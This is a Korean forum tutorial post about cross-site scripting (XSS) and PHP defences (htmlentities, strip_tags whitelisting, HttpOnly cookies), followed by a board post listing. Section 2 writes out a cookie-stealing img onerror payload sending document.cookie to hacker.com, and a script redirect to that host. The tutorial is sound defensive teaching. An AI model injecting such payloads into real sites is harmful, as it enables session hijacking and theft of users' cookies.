• 목록
  • 아래로
  • 위로
  • 1
  • title: 황금 서버 (30일)humit
  • 조회 수 750

※ 주의 : 이 내용에 있는 방법을 이용해 다른 사이트를 해킹하려고 시도를 할 경우 법적인 처벌을 받을 수 있습니다. 단순히 참고용 혹은 대비 방법에 대해 익히는 정도로만 이해를 하시면 됩니다.

 

아마 여기에 있는 분들은 모두 자신만의 홈페이지를 꾸미는 것을 목표로 할 것입니다. 물론 홈페이지를 꾸미는 것도 좋지만 보안의 경우에도 신경을 쓰는 것이 좋습니다. 보안에 신경을 쓰지 않는다면 그 서버는 해커에 의해서 털리게 되고, 또한 그렇게 되면 해커가 그 서버를 경유지로 해서 다른 서버도 터는 것이 가능해지기 때문에 위험합니다. 저의 경우에도 이와 비슷한 일을 겪을 뻔 했습니다....

그렇기 때문에 보안을 신경쓰는 것이 중요합니다. 이번 내용에서는 XSS가 무엇인지에 대해 살펴보고, 이를 어떻게 막을 수 있는지에 대해 알아보도록 하겠습니다.

 

1. XSS란 무엇인가?

XSS는 cross-site scripting의 약자로 한국말로는 사이트 간 스크립팅이라고 합니다. 이를 이용해서 해커는 사용자의 권한을 탈취하여 그 사용자인것 마냥 행동을 할 수도 있고, 혹은 사이트의 동작을 이상하게 만들어버릴 수도 있습니다. (이상한 사이트로 리다이렉트를 시킨다는 등..) 만약 관리자의 권한이 탈취당하게 된다면 대형 사고가 터질 수 있겠지요...

 

2. 대표적인 공격 예시. (실제로 동작하는 서버에 절대로 시도하지 마세요!!)

2.1. 사용자 권한 탈취하기.

보통 사용자 권한은 cookie를 이용해서 체크를 합니다. 즉 cookie라는 값이 카드키라고 생각을 하시면 됩니다. 만약 이 카드키를 복제한다면 권한이 없는 사람도 들어올 수 있겠지요. XSS를 이용하면 다른 사람의 cookie 정보를 가져올 수 있습니다.

만약 게시판에 XSS 공격이 막혀있지 않다면, 게시글의 내용에 <img src="/" onerror="this.src='http://hacker.com/?cookie='+encodeURIComponent(document.cookie)"/>와 같은 방식으로 작성을 하게 되면 cookie 값이 해커의 서버로 들어가게 됩니다.

즉 이렇게 얻은 cookie 값으로 해커가 쿠키 변조를 해서 접속을 하면 그 사용자처럼 행동이 가능합니다.

 

2.2. 이상한 사이트로 리다이렉트

Javascript에서 리다이렉트를 시키는 방법을 이용하는 방법입니다. 간단한 방법은 <script>location.href="http://hacker.com/";</script> 과 같은 방식을 사용하면 됩니다.

 

3. 어떻게 공격을 막을 것인가?

먼저 Wordpress나 XE와 같은 CMS를 이용하고 있는 경우에는 새로운 보안 업데이트가 나오면 바로바로 적용을 해주도록 합니다. 우리가 신경쓸 필요 없이 알아서 개발자 분들이 보안 업데이트를 해주시니 편리하게 바로바로 적용을 할 수 있습니다.

문제는 직접 PHP 코드를 작성해 게시판과 같은 기능을 구현하려고 하는 경우입니다. 이 경우에는 3가지 정도의 방안이 있습니다.

 

첫 번째 방법은 아예 HTML Markup이 되지 않도록 적용하는 방법입니다. 이 방법은 Naver나 Daum, Tistory 등에서의 댓글에서 채택한 방법입니다. 즉 HTML에서 태그를 나타내는 기호인 <와 >를 각각 < >로 변경해서 화면에서 <와 >로 보이게 하는 방식입니다.

이를 PHP에서는 htmlentities 함수를 사용하면 됩니다. (<?=htmlentities($content);?>와 같이 사용하시면 됩니다.)

 

두 번째 방법은 white list를 이용하는 방법입니다. 이 방법은 일부 태그를 허용해주게 하는 방법(이미지 태그나 혹은 강조를 위한 <b> 태그 등..)으로 Wordpress의 댓글에서 채택한 방법입니다. 즉 어떤 태그가 동작하지 않도록 하는 것이 아니라 동작을 하게 할 태그를 골라낸다는 것입니다.

PHP에서는 strip_tags함수를 이용하면 쉽게 구현을 할 수 있습니다. 첫 번째 인자는 전체 문자열을 주고, 두 번째 인자로는 허용할 태그를 표현하면 됩니다. 예를 들어 <p>와 <a> 태그만을 허용하려면, <?=strip_tags($content, '<p><a>');?>와 같이 사용하시면 됩니다.

 

세 번째 방법은 브라우저가 업데이트 되면서 추가된 기능인 쿠키에서의 HTT_ONLY 옵션입니다.

이 옵션이 true인 경우에는 자바스크립트 상에서 document.cookie와 같이 쿠키 값을 리턴하는 것을 호출하더라도 해당되는 쿠키의 값이 노출이 안되는 것입니다. 대부분의 사이트가 이 옵션을 기본적으로 사용하고 있습니다.

다만 이 방법의 경우 버전이 낮은 브라우저에 대해서는 적용이 안된다는 단점이 있습니다.

PHP에서 적용하는 방법은 http://php.net/manual/kr/function.session-set-cookie-params.php를 참조하시기 바랍니다.

 

4. 에필로그

이렇게 XSS가 무엇이고 이를 막기 위해서 어떤 방법을 취할 수 있는지에 대해서 살펴보았습니다. 다음 내용은 아마 SQL Injection이 무엇인지와 이를 어떻게 방어할 수 있는지에 대해 작성해보도록 하겠습니다.

 

5. 참고 자료

https://ko.wikipedia.org/wiki/사이트_간_스크립팅

http://php.net/manual/kr/function.htmlentities.php

http://php.net/manual/kr/function.strip-tags.php

http://php.net/manual/kr/function.session-set-cookie-params.php

 

 

작성자
title: 황금 서버 (30일)humit 119 Lv. (0%) 1187020/115200000EXP

Study For Us Hosting 1기 모니터링 관리자 (16.12.01 ~ 17.01.08.)

C++, Python, PHP를 주로 사용하며 알고리즘, DL, 해킹 쪽에 관심이 있습니다.

휴학생입니다.

티스토리 블로그 : http://humit.tistory.com/

카카오톡 봇 : http://pf.kakao.com/_Efrbu/chat

지식인 프로필 : https://kin.naver.com/profile/jhjang1005

댓글 1

신고

"하루살이님의 댓글"

이 댓글을 신고 하시겠습니까?

권한이 없습니다.
번호 제목 글쓴이 날짜 조회 수
공지 시스템 점검 작업 완료 안내 10 마스터 마스터 24.09.05.16:25 2556
공지 [중요] 호스팅 만료와 관련하여 일부 수칙이 변경됩니다. 4 마스터 마스터 23.01.14.02:23 9972
279 구글 플레이 스토어 안드로이드 앱 APK 다운로드 하는 법 2 image 막시모 막시모 16.07.13.22:45 523
278 Windows에서 악센트 문자 입력하기 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:43 332
277 구세대 그래픽카드로 신기술 NVIDIA Fast Sync 사용하기. image 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:43 767
276 NVIDIA FastSync image 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:48 395
275 분실 스마트폰(아이폰/안드로이드폰) 찾기 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:49 470
274 알고 나면 너무 편하다. 윈도우 단축키 2 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:51 566
273 윈도우 순정버전 구하는 법 1 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:51 469
272 110V와 220V를 사용하는 국가와 그 비교 1 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:55 11582
271 엔비디아 제어판 설정으로 비디오 화질 개선 1 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.13.23:58 2542
270 온라인에서 Matlab을 사용해보자. 2 image humit title: 황금 서버 (30일)humit 16.07.14.01:00 2166
[보안] XSS에 대한 내용과 방지 방법. 1 humit title: 황금 서버 (30일)humit 16.07.14.02:10 750
268 비트코인으로 뉴에그 쉽게 결제해보자 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.17:30 401
267 안드로이드 창 뜨는 속도 빠르게 하기 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.20:18 769
266 자신의 아이피를 찾는방법 1 title: 황금 서버 (30일)어코 16.07.14.20:32 367
265 해상도 출력과 송신 대여폭 차이 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.21:01 261
264 RAMCache(램캐쉬)와 RAMDisk(램디스크) 개념 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.22:24 3593
263 무료 인터넷 멀티미디어 편집 사이트 1 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.22:24 264
262 토렌트 - 램디스크 활용 팁 image 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.22:26 899
261 윈도우 10 라이센스 종류 1 하루살이 title: 황금 서버 (30일)하루살이 16.07.14.22:28 408
260 Jquery CDN 추천 3 title: 금메달 (30일)동방개념지국 16.07.15.00:49 387